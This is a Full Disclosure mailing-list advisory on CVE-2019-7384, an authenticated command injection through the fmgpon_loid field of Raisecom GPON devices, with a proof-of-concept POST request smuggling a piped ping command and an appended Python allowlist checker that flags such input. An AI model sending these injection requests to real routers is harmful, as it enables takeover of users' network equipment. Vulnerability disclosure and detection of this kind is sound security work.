<!--X-Body-Begin-->
<!--X-User-Header-->
<a href="/fulldisclosure/"><img src="/images/fulldisclosure-logo.png" class="l-logo right" alt="fulldisclosure logo" width="80"></a>
<h2 class="m-list"><a href="/fulldisclosure/">Full Disclosure</a>
mailing list archives</h2>
<!--X-User-Header-End-->
<!--X-TopPNI-->
<!--X-TopPNI-End-->
<!--X-MsgBody-->
<!--X-Subject-Header-Begin-->
<h1 class="m-title">KSA-Dev-005:CVE-2019-7384: Authenticated Remote Code Execution in Raisecom GPON Devices</h1>
<hr>
<!--X-Subject-Header-End-->
<!--X-Head-of-Message-->
<em>From</em>: Kingkaustubh via Fulldisclosure <fulldisclosure () seclists org>
<em>Date</em>: Tue, 12 Feb 2019 14:41:51 +0530
<!--X-Head-of-Message-End-->
<!--X-Head-Body-Sep-Begin-->
<hr>
<!--X-Head-Body-Sep-End-->
<!--X-Body-of-Message-->
<pre style="margin: 0em;">=====================================
Authenticated Shell Command Injection
=====================================
.. contents:: Table of Contents
Overview
========
Title: Authenticated Shell Command Injection
Author: Kaustubh G. Padwad
CVE ID: CVE-2019-7384
Vendor: Raisecom Technology Co., Ltd
Product: GPON-ONU HT803G-07 (other models that share the same codebase may also be affected)
Potentially vulnerable:
  ISCOM HT803G-U
  ISCOM HT803G-W
  ISCOM HT803G-1GE
  ISCOM HT803G
Tested Version: ISCOMHT803G-U_2.0.0_140521_R4.1.47.002
Severity: High--Critical
Advisory ID
============
KSA-Dev-005
About the Product:
==================
The Raisecom GPON optical network terminal (ONT) series provides a flexible mix of residential access services
including high speed data, IPTV, voice and CATV services compliant with the ITU-T G.984 standard. In particular, the
Raisecom ONUs are designed for Ethernet data services, voice over IP, IPTV, CATV, wireless router accessing and
convenient USB2.0 home network storage connections for various application scenarios, such as residential triple-play
service and business connections. The GPON ONT series offer flexible choices in terms of downlink types and numbers,
such as, GE/FE auto-adapting Ethernet ports, POTS (FXS) interfaces, RF port and WiFi function compliant with IEEE
802.11b/g/n. All GPON FTTX ONUs offer advanced end-to-end management and monitoring functionality, and the GPON series
can be managed under the Raisecom NView platform.
Description:
============
An authenticated shell command injection issue has been discovered in Raisecom ISCOM HT803G-U, HT803G-W, HT803G-1GE,
and HT803G GPON products with the firmware version
ISCOMHT803G-U_2.0.0_140521_R4.1.47.002 or below. The value of the fmgpon_loid parameter is used in a system call
inside the boa binary. Because there is no user input validation, this leads to authenticated code execution on the
device.
Additional Information
======================
The value of the fmgpon_loid parameter is passed to a system call in the implementation of the application code inside
the boa binary, and since there is no user input validation, this leads to authenticated code execution on the device.
Vulnerability Class:
====================
Authenticated Shell Command Injection
Attack Type
===========
Local
Impact Code execution
=====================
true
Attack Vectors
==============
To exploit this vulnerability, one must either visit a crafted page or pass a properly crafted request to
the device.
How to Reproduce: (POC):
========================
POST /boaform/admin/formgponConf HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: <a rel="nofollow" href="http://192.168.1.1/gpon.asp">http://192.168.1.1/gpon.asp</a>
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 162

fmgpon_loid=%7c%20ping%20-n%2013%20127%2e0%2e0%2e1%20%7c&fmgpon_loid_password=raisecom&fmgpon_ploam_password=1234567890&apply=Apply+Changes&submit-url=%2Fgpon.asp
Mitigation
==========
According to the vendor, this issue is fixed in the latest firmware.
Disclosure:
===========
28-NOV-2018 Discovered the vulnerability
28-NOV-2018 Reported to vendor
10-Dec-2018 Received confirmation from vendor regarding fix
04-JAN-2019 Requested the CVE ID
04-FEB-2018 CVE assigned
Credits:
========
* Kaustubh Padwad
* Information Security Researcher
* kingkaustubh () me com
* <a rel="nofollow" href="https://s3curityb3ast.github.io/">https://s3curityb3ast.github.io/</a>
* <a rel="nofollow" href="https://twitter.com/s3curityb3ast">https://twitter.com/s3curityb3ast</a>
* <a rel="nofollow" href="http://breakthesec.com">http://breakthesec.com</a>
* <a rel="nofollow" href="https://www.linkedin.com/in/kaustubhpadwad">https://www.linkedin.com/in/kaustubhpadwad</a>
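
Added example (not part of the original advisory and not vendor code): the input validation the
Description says is missing, written as an allowlist check that can run in a reverse proxy or over captured
requests to flag a suspicious fmgpon_loid. The LOID format (1-24 characters from a small safe set) and the
function name are assumptions; the benign body is constructed.

```python
import re
from urllib.parse import parse_qs

# Assumption: a legitimate LOID is 1-24 characters of letters, digits,
# '.', '_' or '-'. Adjust to what the access provider actually issues.
LOID_ALLOWED = re.compile(r"[A-Za-z0-9._-]{1,24}")

# Form handler path taken from the request shown in the advisory.
GPON_FORM_PATH = "/boaform/admin/formgponConf"


def check_gpon_request(method, path, body):
    """Return a list of findings for one HTTP request; empty means clean."""
    if method.upper() != "POST" or path.split("?", 1)[0] != GPON_FORM_PATH:
        return []
    # keep_blank_values so an empty LOID is reported instead of skipped.
    fields = parse_qs(body, keep_blank_values=True)
    values = fields.get("fmgpon_loid", [])
    findings = []
    if len(values) > 1:
        findings.append("fmgpon_loid supplied more than once")
    for value in values:
        # parse_qs has already percent-decoded the value, so encoded
        # metacharacters such as %7c are compared in their decoded form.
        if not LOID_ALLOWED.fullmatch(value):
            findings.append("fmgpon_loid outside allowlist: %r" % value)
    return findings


# Form body from the advisory's request.
ADVISORY_BODY = (
    "fmgpon_loid=%7c%20ping%20-n%2013%20127%2e0%2e0%2e1%20%7c"
    "&fmgpon_loid_password=raisecom&fmgpon_ploam_password=1234567890"
    "&apply=Apply+Changes&submit-url=%2Fgpon.asp"
)
# Constructed benign body for comparison.
BENIGN_BODY = (
    "fmgpon_loid=ONU-000123&fmgpon_loid_password=example"
    "&apply=Apply+Changes&submit-url=%2Fgpon.asp"
)

if __name__ == "__main__":
    for name, body in (("advisory", ADVISORY_BODY), ("benign", BENIGN_BODY)):
        print(name, check_gpon_request("POST", GPON_FORM_PATH, body))
```

The same allowlist belongs in the form handler itself, applied before the value is used to build any command.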
</pre>
<!--X-Body-of-Message-End-->
<!--X-MsgBody-End-->
<!--X-Follow-Ups-->
<hr>
<!--X-Follow-Ups-End-->
<!--X-References-->
<!--X-References-End-->
<!--X-BotPNI-->
<!--X-BotPNI-End-->
<!--X-User-Footer-->
<!--X-User-Footer-End-->
<p>